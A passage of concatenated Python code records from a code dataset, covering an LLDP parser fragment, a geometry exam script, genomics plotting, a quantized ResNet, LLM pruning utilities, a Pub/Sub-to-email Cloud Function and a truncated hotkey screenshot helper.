loop:\n break\n else:\n tlv_subtype = struct.unpack(\"!B\", lldpDU[0:1]) \\\n if tlv_type is 2 else \"\"\n startbyte = 1 if tlv_type is 2 else 0\n tlv_datafield = lldpDU[startbyte:tlv_len]\n\n if tlv_type == 4:\n port_id = tlv_datafield\n elif tlv_type == 5:\n system_name = tlv_datafield\n else:\n pass\n\n lldpPayload = lldpPayload[2 + tlv_len:]\n\n return (system_name, port_id)\n\ndef mac_addr(address):\n \"\"\"\n Convert a MAC address to a readable/printable string\n \"\"\"\n return ':'.join('%02x' % ord(b) for b in address)\n","repo_name":"mattjhayes/nmeta2dpae","sub_path":"nmeta2dpae/tc.py","file_name":"tc.py","file_ext":"py","file_size_in_byte":18368,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"3396515355","text":"\"\"\"\r\nExamen 3D Recuperacion\r\nAlexis Saúl Castillo Gonzalez\r\n\"\"\"\r\nimport matplotlib.pyplot as plt \r\nimport numpy as np\r\nfrom math import sqrt \r\nimport sys\r\nimport keyboard\r\n\r\n#Declaracion del arrgelo\r\nx=[30,40,80,10,40]\r\ny=[10,60,60,10,75]\r\nz=[-10,10,10,0,0]\r\n\r\n#funcion del ploteo de la figura\r\ndef plotPlaneLine(xg,yg,zg,bandera,areaBase,area1,area2):\r\n #Tamaño del grid\r\n plt.title('Alexis Saúl Castillo Gonzales')\r\n plt.axis([0,150,100,0])\r\n plt.axis('on')\r\n plt.grid(True)\r\n plt.xlabel('Eje x')\r\n plt.ylabel('Eje y')\r\n\r\n #Triangulo base\r\n plt.plot([x[0],x[1]],[y[0],y[1]],color='k')\r\n plt.plot([x[1],x[2]],[y[1],y[2]],color='k')\r\n plt.plot([x[2],x[0]],[y[2],y[0]],color='k')\r\n\r\n #Triangulos lados\r\n plt.plot([x[0],x[3]],[y[0],y[3]],linestyle=':',color='r')\r\n plt.plot([x[3],x[1]],[y[3],y[1]],linestyle=':',color='g')\r\n plt.plot([x[3],x[2]],[y[3],y[2]],linestyle=':',color='y')\r\n\r\n #Linea de interseccion\r\n plt.plot([x[3],x[4]],[y[3],y[4]],color='b')\r\n\r\n if(bandera==True):\r\n plt.text(100,60,'Hitpoint dentro del plano')\r\n else:\r\n plt.text(100,60,'Hitpoint fuera del plano')\r\n\r\n areaBase = int(areaBase)\r\n area1 = int(area1)\r\n area2 = int(area2)\r\n\r\n plt.text(100,25,'Area base=')\r\n plt.text(125,25,areaBase)\r\n plt.text(100,35,'Area1=')\r\n plt.text(120,35,area1)\r\n plt.text(100,40,'Area2=')\r\n plt.text(120,40,area2)\r\n plt.text(100,50,'Area1+Area2=')\r\n plt.text(135,50,area1+area2)\r\n plt.show()\r\n\r\ndef hitpoint(x,y,z):\r\n #Triangulo base\r\n #Distancia de 0 a 1\r\n a=x[1]-x[0]\r\n b=y[1]-y[0]\r\n c=z[1]-z[0]\r\n D01=sqrt(a*a+b*b+c*c) \r\n #Distancia de 1 a 2\r\n a=x[2]-x[1]\r\n b=y[2]-y[1]\r\n c=z[2]-z[1]\r\n D12=sqrt(a*a+b*b+c*c) \r\n #Distancia de 0 a 2\r\n a=x[2]-x[0]\r\n b=y[2]-y[0]\r\n c=z[2]-z[0]\r\n D02=sqrt(a*a+b*b+c*c)\r\n #Calcular area con formula de Heron\r\n s=(D01+D12+D02)/2\r\n areaBase=sqrt(s*(s-D01)*(s-D12)*(s-D02))\r\n \r\n #Triangulo 1\r\n #Distancia de 0 a 1\r\n a=x[1]-x[0]\r\n b=y[1]-y[0]\r\n c=z[1]-z[0]\r\n D01=sqrt(a*a+b*b+c*c) \r\n #Distancia de 1 a 3\r\n a=x[3]-x[1]\r\n b=y[3]-y[1]\r\n c=z[3]-z[1]\r\n D13=sqrt(a*a+b*b+c*c) \r\n #Distancia de 0 a 3\r\n a=x[3]-x[0]\r\n b=y[3]-y[0]\r\n c=z[3]-z[0]\r\n D03=sqrt(a*a+b*b+c*c)\r\n #Calcular area con formula de Heron\r\n s=(D01+D13+D03)/2\r\n area1=sqrt(s*(s-D01)*(s-D13)*(s-D03))\r\n\r\n #Triangulo 2\r\n #Distancia de o a 2\r\n a=x[2]-x[0]\r\n b=y[2]-y[0]\r\n c=z[2]-z[0]\r\n D02=sqrt(a*a+b*b+c*c) \r\n #Distancia de 2 a 3\r\n a=x[3]-x[2]\r\n b=y[3]-y[2]\r\n c=z[3]-z[2]\r\n D23=sqrt(a*a+b*b+c*c) \r\n #Distancia de 0 a 3\r\n a=x[3]-x[0]\r\n b=y[3]-y[0]\r\n c=z[3]-z[0]\r\n D03=sqrt(a*a+b*b+c*c)\r\n #Calcular area con formula de Heron\r\n s=(D02+D23+D03)/2\r\n area2=sqrt(s*(s-D02)*(s-D23)*(s-D03))\r\n\r\n #Verificacion del hitpoint\r\n sumaAreas = area1+area2\r\n bandera = True\r\n if(areaBase>sumaAreas):\r\n bandera = True\r\n else:\r\n bandera = False\r\n \r\n #Manda a plotear la figura y etiquetas\r\n plotPlaneLine(x,y,z,bandera,areaBase,area1,area2)\r\n\r\n#inserccion de datos y hitpoint\r\nprint(\"pulsa Enter para continuar o ESC para salir\")\r\nwhile True:\r\n \r\n if keyboard.is_pressed('Esc'):\r\n sys.exit(0)\r\n if keyboard.is_pressed('ENTER'):\r\n tecla=input('-----')\r\n hx=input(\"Hitpoint x:\")\r\n hy=input(\"Hitpoint y:\")\r\n #Asignacion de los arreglos\r\n x[3]=int(hx)\r\n y[3]=int(hy)\r\n hitpoint(x,y,z)\r\n print(\"pulsa Enter para continuar o ESC para salir\")\r\n\r\nplt.show()","repo_name":"alexis-saul/examen_recuperacion3d","sub_path":"examen_recuperacion_3d.py","file_name":"examen_recuperacion_3d.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"15461902409","text":"###\n### This script builds histograms from the coverage profile text files.\n###\n\nimport sys,numpy\nimport matplotlib,matplotlib.pyplot\n\nmatplotlib.rcParams.update({'font.size':18,'font.family':'Arial','xtick.labelsize':14,'ytick.labelsize':14})\nmatplotlib.rcParams['pdf.fonttype']=42\n\ndef cdsBlockDefiner(genomicFeature):\n\n '''\n This function defines the CDS blocks for each genomic feature.\n '''\n\n cdsBlocks=[]\n geneIDs=[]\n\n if genomicFeature in riboOperons:\n geneIDs=riboOperons[genomicFeature]\n else:\n geneIDs=[genomicFeature]\n\n for geneID in geneIDs:\n\n start=geneAnnotations[geneID][0]\n end=geneAnnotations[geneID][1]\n strand=geneAnnotations[geneID][2]\n cdsBlocks.append([start,end,strand,geneID])\n\n return cdsBlocks\n\ndef coverageFileReader(dataFileName):\n\n '''\n This function reads the coverage files and returns the positions and the coverage.\n '''\n\n strand=None; experiment=None\n pos=[]; coverage=[]\n with open(dataFileName,'r') as f:\n for line in f:\n vector=line.split()\n\n # f.1. obtaining the metadata\n if vector[1] == 'strand':\n strand=vector[2]\n if vector[1] == 'experiment':\n experiment=vector[2]\n\n # f.2. reading the information\n if vector[0] != '#':\n \n # define which column to read\n if experiment == 'rbf':\n if strand == '+':\n column=1\n elif strand == '-':\n column=2\n else:\n print('Error selecting strand at rbf. Exiting...')\n sys.exit()\n \n elif experiment == 'trna':\n if strand == '+':\n column=2\n elif strand == '-':\n column=1\n else:\n print('Error selecting strand at trna. Exiting...')\n sys.exit()\n else:\n print(experiment)\n print('Error from experiment selection. Exiting...')\n sys.exit()\n \n # read columns\n pos.append(int(vector[0]))\n coverage.append(int(vector[column]))\n\n # dealing with positions\n if strand == '-':\n pos=pos[::-1]\n p=numpy.array(pos)\n normalizedPosition=p-min(p)-margin\n\n return normalizedPosition,coverage\n\ndef dataReader():\n\n '''\n This function reads the ribosomal protein operons and genes.\n '''\n\n # f.1. ribo-pt gene operons\n operonPredictions={}\n fileName=operonPredictionsDir+'riboPtOperons.txt'\n with open(fileName,'r') as f:\n next(f)\n for line in f:\n vector=line.split('\\t')\n name=vector[0]\n genes=[]\n for i in range(len(vector)-1):\n gene=vector[i+1].replace('\\n','')\n genes.append(gene)\n operonPredictions[name]=genes\n\n # f.2. non-operon ribo-pt genes\n NORPGs=[]\n fileName=operonPredictionsDir+'NORPGs.txt'\n with open(fileName,'r') as f:\n next(f)\n for line in f:\n vector=line.split('\\t')\n name=vector[0].replace('\\n','')\n NORPGs.append(name)\n\n # f.3. print information about retrieval\n a=[]\n for operon in operonPredictions:\n for name in operonPredictions[operon]:\n if name not in a:\n a.append(name)\n print('\\t Recovered {} genes in {} operons.'.format(len(a),len(operonPredictions)))\n print('\\t Recovered {} genes not in operons.'.format(len(NORPGs)))\n for name in NORPGs:\n if name not in a:\n a.append(name)\n print('\\t Total genes recovered: {}'.format(len(a)))\n \n return operonPredictions,NORPGs\n\ndef figureMaker(genomicFeature,cdsBlocks):\n\n '''\n This function builds a figure of the coverage of reads over genomic features.\n '''\n \n # f.1. iterate over experiments\n for experiment in experiments:\n\n fig=matplotlib.pyplot.figure()\n ax=fig.add_subplot(111)\n heaven=0\n for timepoint in timepoints:\n y=[]\n for replicate in replicates:\n dataFileName='{}{}.{}.{}.{}.txt'.format(coverageDir,timepoint,replicate,genomicFeature,experiment)\n pos,coverage=coverageFileReader(dataFileName)\n y.append(coverage)\n\n # compute PDF \n average=numpy.mean(numpy.array(y),axis=0)\n pdf=average/sum(average)\n if heaven < numpy.max(pdf):\n heaven=numpy.max(pdf)\n\n # define the color\n theColor=colors[timepoints.index(timepoint)]\n\n # plot\n ax.plot(pos,pdf,'-',color=theColor,label=timepoint)\n\n # f.1.2. make boxes\n strand=cdsBlocks[0][2]\n boxSize=heaven*0.1\n postTexty=-boxSize/2\n \n for block in cdsBlocks:\n\n geneName=block[-1]\n boxLabel=synonyms[geneName][0]\n\n # stand-specific options\n if strand == '+':\n\n ref=cdsBlocks[0][0]\n start=block[0]-ref\n end=block[1]-ref\n\n else:\n \n ref=cdsBlocks[-1][1]\n start=ref-block[1]\n end=ref-block[0]\n\n # make boxes\n geneBox=matplotlib.patches.Rectangle(xy=(start,-boxSize),width=(end-start),height=boxSize,fc='white',lw=1,ec='black')\n ax.add_patch(geneBox)\n\n # define text\n posTextx=start+(end-start)/2\n if end-start > 500:\n theFontSize=10\n else:\n theFontSize=7\n ax.text(posTextx,postTexty,boxLabel,color='black',horizontalalignment='center',verticalalignment='center',fontsize=theFontSize)\n\n # f.1.3 final figure closing\n matplotlib.pyplot.xlabel(\"Relative genomic position (5'->3')\")\n matplotlib.pyplot.ylabel('p(coverage)')\n if experiment == 'trna':\n flag='RNA-seq'\n else:\n flag='Ribo-seq'\n\n matplotlib.pyplot.title('{} {}'.format(genomicFeature,flag))\n\n matplotlib.pyplot.legend(markerscale=1.5,framealpha=1,loc=0,ncol=2,fontsize=14)\n\n matplotlib.pyplot.ylim([-1.5*boxSize,boxSize*10.5])\n\n figureName='figures/figure.{}.{}.pdf'.format(genomicFeature,experiment)\n matplotlib.pyplot.tight_layout()\n matplotlib.pyplot.savefig(figureName)\n matplotlib.pyplot.clf()\n\n return None\n\ndef geneAnnotationReader():\n\n geneAnnotations={}\n\n with open(gffFile,'r') as f:\n next(f)\n next(f)\n for line in f:\n vector=line.split('\\t')\n if len(vector) > 3:\n if vector[2] == 'gene': # check if gene and cds match exact position for all\n name=vector[8].split(';')[0].replace('ID=','')\n start=int(vector[3])\n end=int(vector[4])\n strand=vector[6]\n geneAnnotations[name]=[start,end,strand]\n\n return geneAnnotations\n\ndef synonymsReader():\n\n '''\n This function reads the GFF3 file and returns a dictionary with synonyms between old and new locus names.\n '''\n\n synonyms={}\n with open(gffFile,'r') as f:\n for line in f:\n vector=line.split('\\t')\n if vector[0][0] != '#':\n info=vector[-1].replace('\\n','')\n if 'old_locus_tag=' in info:\n old=info.split('old_locus_tag=')[1].split(';')[0]\n new=info.split('ID=')[1].split(';')[0]\n\n if '%' in old:\n olds=old.split('%2C')\n synonyms[new]=[old for old in olds]\n else:\n synonyms[new]=[old]\n \n return synonyms\n\n###\n### MAIN\n###\n\n# 0. user defined variables\ncoverageDir='/Volumes/omics4tb/alomana/projects/TLR/data/coverage/'\noperonPredictionsDir='/Volumes/omics4tb/alomana/projects/TLR/data/microbesOnline/'\ngffFile='/Volumes/omics4tb/alomana/projects/TLR/data/genome/alo.build.NC002607.NC001869.NC002608.gff3'\n\ntimepoints=['tp.1','tp.2','tp.3','tp.4']\nreplicates=['rep.1','rep.2','rep.3']\nexperiments=['rbf','trna']\n\ncolors=['red','orange','green','blue']\n\nmargin=0 # excess of base pairs\n\n# 1. read data\nprint('reading data...')\n\n# 1.1. read gff3 file\ngeneAnnotations=geneAnnotationReader()\n\n# 1.2. read operon memberships\nriboOperons,NORPGs=dataReader()\ngenomicFeatures=list(riboOperons.keys())+NORPGs\ngenomicFeatures.sort()\n\ngenomicFeatures=['gene-VNG_RS06605']\n\n# 1.3. define synonyms\nsynonyms=synonymsReader()\n\n# 2. build figure\nprint('building figures...')\n\nfor genomicFeature in genomicFeatures:\n print('building figure for {}...'.format(genomicFeature))\n cdsBlocks=cdsBlockDefiner(genomicFeature)\n figureMaker(genomicFeature,cdsBlocks)\n\nprint('... completed.')\n","repo_name":"adelomana/30sols","sub_path":"SI/extra/coverage/figureMaker.py","file_name":"figureMaker.py","file_ext":"py","file_size_in_byte":9094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"2697400578","text":"import torch.nn as nn\r\nimport torch\r\nimport torch.nn.functional as F\r\nimport sys\r\nimport time\r\nfrom quant_dorefa import *\r\n__all__ = ['net']\r\n\r\nclass resnet(nn.Module):\r\n\r\n def __init__(self):\r\n super(resnet, self).__init__()\r\n\r\n def forward(self, x):\r\n x = self.fq0(x)\r\n x = self.conv1(x)\r\n x = self.bn1(x)\r\n x = self.relu1(x)\r\n x = self.fq1(x)\r\n\r\n residual = x.clone() \r\n out = x.clone()\r\n\r\n out = self.conv2(out)\r\n out = self.bn2(out)\r\n out = self.relu2(out)\r\n out = self.fq2(out)\r\n\r\n out = self.conv3(out)\r\n out = self.bn3(out)\r\n out+=residual\r\n out = self.relu3(out)\r\n out = self.fq3(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n out = self.conv4(out)\r\n out = self.bn4(out)\r\n out = self.relu4(out)\r\n out = self.fq4(out)\r\n\r\n out = self.conv5(out)\r\n out = self.bn5(out)\r\n out+=residual\r\n out = self.relu5(out)\r\n out = self.fq5(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n out = self.conv6(out)\r\n out = self.bn6(out)\r\n out = self.relu6(out)\r\n out = self.fq6(out)\r\n\r\n out = self.conv7(out)\r\n out = self.bn7(out)\r\n out+=residual\r\n out = self.relu7(out)\r\n out = self.fq7(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n #########Layer################ \r\n out = self.conv8(out)\r\n out = self.bn8(out)\r\n out = self.relu8(out)\r\n out = self.fq8(out)\r\n\r\n out = self.conv9(out)\r\n out = self.bn9(out)\r\n residual = self.resconv1(residual)\r\n out+=residual\r\n out = self.relu9(out)\r\n out = self.fq9(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n out = self.conv10(out)\r\n out = self.bn10(out)\r\n out = self.relu10(out)\r\n out = self.fq10(out)\r\n\r\n out = self.conv11(out)\r\n out = self.bn11(out)\r\n out+=residual\r\n out = self.relu11(out)\r\n out = self.fq11(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n out = self.conv12(out)\r\n out = self.bn12(out)\r\n out = self.relu12(out)\r\n out = self.fq12(out)\r\n\r\n out = self.conv13(out)\r\n out = self.bn13(out)\r\n out+=residual\r\n out = self.relu13(out)\r\n out = self.fq13(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n #########Layer################ \r\n out = self.conv14(out)\r\n out = self.bn14(out)\r\n out = self.relu14(out)\r\n out = self.fq14(out)\r\n\r\n out = self.conv15(out)\r\n out = self.bn15(out)\r\n residual = self.resconv2(residual)\r\n out+=residual\r\n out = self.relu15(out)\r\n out = self.fq15(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n out = self.conv16(out)\r\n out = self.bn16(out)\r\n out = self.relu16(out)\r\n out = self.fq16(out)\r\n\r\n out = self.conv17(out)\r\n out = self.bn17(out)\r\n out+=residual\r\n out = self.relu17(out)\r\n out = self.fq17(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n out = self.conv18(out)\r\n out = self.bn18(out)\r\n out = self.relu18(out)\r\n out = self.fq18(out)\r\n\r\n out = self.conv19(out)\r\n out = self.bn19(out)\r\n out+=residual\r\n out = self.relu19(out)\r\n out = self.fq19(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n #########Layer################ \r\n x=out\r\n x = self.avgpool(x)\r\n x = x.view(x.size(0), -1)\r\n x = self.bn20(x)\r\n x = self.fq20(x)\r\n\r\n x = self.fc(x)\r\n x = self.bn21(x)\r\n x = self.logsoftmax(x)\r\n return x\r\n\r\nclass ResNet_cifar(resnet):\r\n\r\n def __init__(self, num_classes=100):\r\n super(ResNet_cifar, self).__init__()\r\n\r\n self.wbit = 8\r\n self.abit = 8\r\n\r\n QConv2d = conv2d_Q_fn(w_bit=self.wbit)\r\n QLinear = linear_Q_fn(w_bit=self.wbit)\r\n\r\n QConv2d_fp = conv2d_Q_fn(w_bit=16)\r\n QLinear_fp = linear_Q_fn(w_bit=16)\r\n \r\n\r\n self.inflate = 1\r\n self.fq0 = activation_quantize_fn(a_bit=self.abit)\r\n self.conv1=nn.Conv2d(3,16*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn1= nn.BatchNorm2d(16*self.inflate)\r\n self.relu1=nn.ReLU(inplace=True)\r\n self.fq1 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv2=QConv2d(16*self.inflate,16*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn2= nn.BatchNorm2d(16*self.inflate)\r\n self.relu2=nn.ReLU(inplace=True)\r\n self.fq2 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv3=QConv2d(16*self.inflate,16*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn3= nn.BatchNorm2d(16*self.inflate)\r\n self.relu3=nn.ReLU(inplace=True)\r\n self.fq3 = activation_quantize_fn(a_bit=self.abit)\r\n #######################################################\r\n\r\n self.conv4=QConv2d(16*self.inflate,16*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn4= nn.BatchNorm2d(16*self.inflate)\r\n self.relu4=nn.ReLU(inplace=True)\r\n self.fq4 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv5=QConv2d(16*self.inflate,16*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn5= nn.BatchNorm2d(16*self.inflate)\r\n self.relu5=nn.ReLU(inplace=True)\r\n self.fq5 = activation_quantize_fn(a_bit=self.abit)\r\n #######################################################\r\n\r\n self.conv6=QConv2d(16*self.inflate,16*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn6= nn.BatchNorm2d(16*self.inflate)\r\n self.relu6=nn.ReLU(inplace=True)\r\n self.fq6 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv7=QConv2d(16*self.inflate,16*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn7= nn.BatchNorm2d(16*self.inflate)\r\n self.relu7=nn.ReLU(inplace=True)\r\n self.fq7 = activation_quantize_fn(a_bit=self.abit)\r\n #######################################################\r\n\r\n #########Layer################ \r\n self.conv8=QConv2d(16*self.inflate,32*self.inflate, kernel_size=3, stride=2, padding=1, bias=False)\r\n self.bn8= nn.BatchNorm2d(32*self.inflate)\r\n self.relu8=nn.ReLU(inplace=True)\r\n self.fq8 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv9=QConv2d(32*self.inflate,32*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn9= nn.BatchNorm2d(32*self.inflate)\r\n self.resconv1=nn.Sequential(QConv2d(16*self.inflate,32*self.inflate, kernel_size=1, stride=2, padding =0, bias=False),\r\n nn.BatchNorm2d(32*self.inflate),)\r\n self.relu9=nn.ReLU(inplace=True)\r\n self.fq9 = activation_quantize_fn(a_bit=self.abit)\r\n #######################################################\r\n\r\n self.conv10=QConv2d(32*self.inflate,32*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn10= nn.BatchNorm2d(32*self.inflate)\r\n self.relu10=nn.ReLU(inplace=True)\r\n self.fq10 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv11=QConv2d(32*self.inflate,32*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn11= nn.BatchNorm2d(32*self.inflate)\r\n self.relu11=nn.ReLU(inplace=True)\r\n self.fq11 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n #######################################################\r\n\r\n self.conv12=QConv2d(32*self.inflate,32*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn12= nn.BatchNorm2d(32*self.inflate)\r\n self.relu12=nn.ReLU(inplace=True)\r\n self.fq12 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv13=QConv2d(32*self.inflate,32*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn13= nn.BatchNorm2d(32*self.inflate)\r\n self.relu13=nn.ReLU(inplace=True)\r\n self.fq13 = activation_quantize_fn(a_bit=self.abit)\r\n #######################################################\r\n\r\n #########Layer################ \r\n self.conv14=QConv2d(32*self.inflate,64*self.inflate, kernel_size=3, stride=2, padding=1, bias=False)\r\n self.bn14= nn.BatchNorm2d(64*self.inflate)\r\n self.relu14=nn.ReLU(inplace=True)\r\n self.fq14 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv15=QConv2d(64*self.inflate,64*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn15= nn.BatchNorm2d(64*self.inflate)\r\n self.resconv2=nn.Sequential(QConv2d(32*self.inflate,64*self.inflate, kernel_size=1, stride=2, padding =0, bias=False),\r\n nn.BatchNorm2d(64*self.inflate),)\r\n self.relu15=nn.ReLU(inplace=True)\r\n self.fq15 = activation_quantize_fn(a_bit=self.abit)\r\n #######################################################\r\n\r\n self.conv16=QConv2d(64*self.inflate,64*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn16= nn.BatchNorm2d(64*self.inflate)\r\n self.relu16=nn.ReLU(inplace=True)\r\n self.fq16 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv17=QConv2d(64*self.inflate,64*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn17= nn.BatchNorm2d(64*self.inflate)\r\n self.relu17=nn.ReLU(inplace=True)\r\n self.fq17 = activation_quantize_fn(a_bit=self.abit)\r\n #######################################################\r\n\r\n self.conv18=QConv2d(64*self.inflate,64*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn18= nn.BatchNorm2d(64*self.inflate)\r\n self.relu18=nn.ReLU(inplace=True)\r\n self.fq18 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv19=QConv2d(64*self.inflate,64*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn19= nn.BatchNorm2d(64*self.inflate)\r\n self.relu19=nn.ReLU(inplace=True)\r\n self.fq19 = activation_quantize_fn(a_bit=self.abit)\r\n #######################################################\r\n\r\n #########Layer################ \r\n self.avgpool=nn.AvgPool2d(8)\r\n self.bn20= nn.BatchNorm1d(64*self.inflate)\r\n self.fq20 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.fc=nn.Linear(64*self.inflate,num_classes, bias=False)\r\n self.bn21= nn.BatchNorm1d(num_classes)\r\n self.logsoftmax=nn.LogSoftmax(dim=1)\r\n\r\n\r\ndef net(**kwargs):\r\n num_classes, depth, dataset = map(\r\n kwargs.get, ['num_classes', 'depth', 'dataset'])\r\n return ResNet_cifar(num_classes=num_classes)\r\n","repo_name":"adarshkosta/HyperX","sub_path":"frozen_quantized_models/resnet20_iofp.py","file_name":"resnet20_iofp.py","file_ext":"py","file_size_in_byte":11091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"25168603407","text":"import glob\nimport os\n\nimport torch\n\nfrom llmshearing.models.composer_llama import ComposerMosaicLlama\nfrom llmshearing.utils.utils import load_weights\n\n\ndef prune_and_save_model(path):\n \"\"\" prune and save the model after pruning \"\"\"\n outpath = os.path.dirname(path) + f\"/pruned-{os.path.basename(path)}\"\n config_file = os.path.join(os.path.dirname(path), \"config.pt\")\n assert os.path.exists(config_file), f\"Config file {config_file} does not exist\"\n \n cfg = torch.load(config_file).model\n if cfg.l0_module.target_model is not None:\n cfg.l0_module.eval_target_model = True # hack\n \n model = ComposerMosaicLlama(cfg)\n weights = load_weights(path)\n \n ree = model.load_state_dict(weights, strict=False)\n print(ree)\n \n model.prune_params() \n model.model.l0_module = None\n model_state_dict = model.state_dict()\n new_weights = change_keys(model_state_dict)\n torch.save(new_weights, outpath)\n print(\"Saved pruned model to path: \", outpath)\n \n\ndef change_keys(weights, output_file=None):\n \"\"\" rename the keys in the weight file to match the new model \"\"\"\n exitsing_layers = []\n for key in weights:\n if \"blocks\" in key and \"rotary\" not in key:\n layer = int(key[key.index(\"blocks\") + len(\"blocks.\"):].split(\".\")[0])\n if layer not in exitsing_layers:\n exitsing_layers.append(layer)\n exitsing_layers = sorted(exitsing_layers)\n print(\"Existing layers: \", len(exitsing_layers), exitsing_layers)\n \n new_weights = {}\n for key in weights:\n if \"rotary\" in key:\n continue\n if \"blocks\" in key:\n layer_index = key.index(\"blocks\") + len(\"blocks.\")\n text_before_layer_index = key[:layer_index]\n layer = int(key[layer_index:].split(\".\")[0])\n text_after_layer_index = key[layer_index + len(str(layer)) + 1:]\n current_layer = exitsing_layers.index(layer)\n new_key = text_before_layer_index + str(current_layer) + \".\" + text_after_layer_index\n print(\"Old param key:\", key)\n print(\"New param key:\", new_key)\n else:\n new_key = key\n new_weights[new_key] = weights[key]\n if output_file is not None:\n torch.save(new_weights, output_file)\n else:\n return new_weights\n \nif __name__ == \"__main__\":\n import fire\n fire.Fire()","repo_name":"princeton-nlp/LLM-Shearing","sub_path":"llmshearing/utils/post_pruning_processing.py","file_name":"post_pruning_processing.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":217,"dataset":"github-code","pt":"20"} +{"seq_id":"36171903061","text":"def pubsub_sendmail(event, context):\n import base64\n import os\n import smtplib\n from email.message import EmailMessage\n\n # Log the message ID and timestamp.\n\n print('BEGIN messageId {} published at {}'.format(context.event_id, context.timestamp))\n\n # Fetch environment variables and set to '' if they are not present.\n # Remove leading and trailing spaces.\n\n mailFrom = os.environ.get('MAIL_FROM', '').strip()\n mailTo = os.environ.get('MAIL_TO', '').strip()\n mailSubject = os.environ.get('MAIL_SUBJECT', '').strip()\n mailServer = os.environ.get('MAIL_SERVER', '').strip()\n mailLocalHost = os.environ.get('MAIL_LOCAL_HOST', '').strip()\n mailForceTls = os.environ.get('MAIL_FORCE_TLS', '').strip()\n mailDebug = os.environ.get('MAIL_DEBUG', '').strip()\n\n # Fetch the pub/sub message and set to '' if not present.\n\n if 'data' in event:\n mailMessageBody = base64.b64decode(event['data']).decode('utf-8')\n else:\n mailMessageBody = ''\n\n debugFlag = mailDebug == \"TRUE\"\n forceTlsFlag = mailForceTls == \"TRUE\"\n\n # Log all of the environment variables.\n\n if debugFlag:\n print('Mail from: {}'.format(mailFrom))\n print('Mail to: {}'.format(mailTo))\n print('Mail subject: {}'.format(mailSubject))\n print('Mail server: {}'.format(mailServer))\n print('Mail local host: {}'.format(mailLocalHost))\n print('Mail force TLS: {}'.format(mailForceTls))\n print('Mail message body: {}'.format(mailMessageBody))\n\n # Create EmailMessage object for eventual transmission.\n\n outboundMessage = EmailMessage()\n outboundMessage.set_content(mailMessageBody)\n outboundMessage['Subject'] = mailSubject\n outboundMessage['From'] = mailFrom\n outboundMessage['To'] = mailTo\n\n # You may need to customize this flow to support your mail relay configuration.\n # Examples may include authentication, encryption, etc.\n\n if forceTlsFlag:\n smtpServer = smtplib.SMTP_SSL(host=mailServer, local_hostname=mailLocalHost)\n else:\n smtpServer = smtplib.SMTP(host=mailServer, local_hostname=mailLocalHost)\n\n if debugFlag:\n smtpServer.set_debuglevel(2)\n\n if (not forceTlsFlag) and smtpServer.has_extn('STARTTLS'):\n smtpServer.starttls()\n smtpServer.ehlo()\n\n smtpServer.send_message(outboundMessage)\n smtpServer.quit()\n\n # Log end of Cloud Function.\n\n print('END messageId {}'.format(context.event_id))\n","repo_name":"GoogleCloudPlatform/cloud-pubsub-sendmail","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"20"} +{"seq_id":"29298859088","text":"import datetime\nimport os.path\nimport re\nimport time\nfrom base64 import b64decode, b64encode\nfrom io import BytesIO\n\nimport pyautogui\nimport pynput.keyboard\nfrom PIL import Image\n\n# 截图保存的文件夹\nimagesPath = r'./images'\n# 截图快捷键, 默认为 F8\npositionKey = pynput.keyboard.Key.f8\nmtime = 600\n\n\ndef getPositionByKey():\n \"\"\"\n 按下按键f8后返回鼠标位置\n :return:\n \"\"\"\n\n def on_press(key):\n return key != positionKey\n\n def daemon():\n t1 = time.time()\n while time.time() < t1 + mtime:\n time.sleep(1)\n return False\n\n with pynput.keyboard.Listener(on_press=on_press, daemon=daemon) as h:\n h.join()\n x, y = 